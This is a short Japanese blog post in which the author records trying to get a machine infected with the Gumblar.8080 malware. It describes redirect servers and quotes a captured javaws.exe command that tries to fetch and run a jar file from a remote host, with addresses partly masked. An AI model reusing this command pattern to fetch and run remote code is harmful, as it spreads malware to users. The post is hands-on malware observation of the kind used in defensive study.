Gumblar.8080系感染してみた 7月9日版 - smilebanana
>もう一度Process Monitorのログが残るような形で試して詳しいログを・・・と思って今やってるんですが、また感染できない状態に戻ってしまいました。
前回の最後に「また感染できない状態に戻ってしましましま。」とお伝えしましまが、以前ふられた時のように、リダイレクト先から何も返事がないというわけではないのです。
パケットログを見ると
一つ目(ns39.xxx.net:8080 [194.150.xxx.199])・二つ目(customer.fxs.se:8080 [62.20.xxx.61])のリダイレクト先サーバーからは次々とへんちくりんなものをダウンロードしてきて、タスクバーにJavaのアイコンが表示されたりして何やらゴソゴソと処理はしているようなんですが、その後
"C:\Program Files\Java\jre6\bin\javaws.exe" http: -J-jar -J\\90.156.xxx.xx1\public\001.jar none
こっそり別のサーバー(90.156.xxx.xx1)からファイルを実行しようとするものの
現在そのファイルにはつながらないらしく、エラー表示。
で、そこからは先に進まず。
みたいな。
コメントする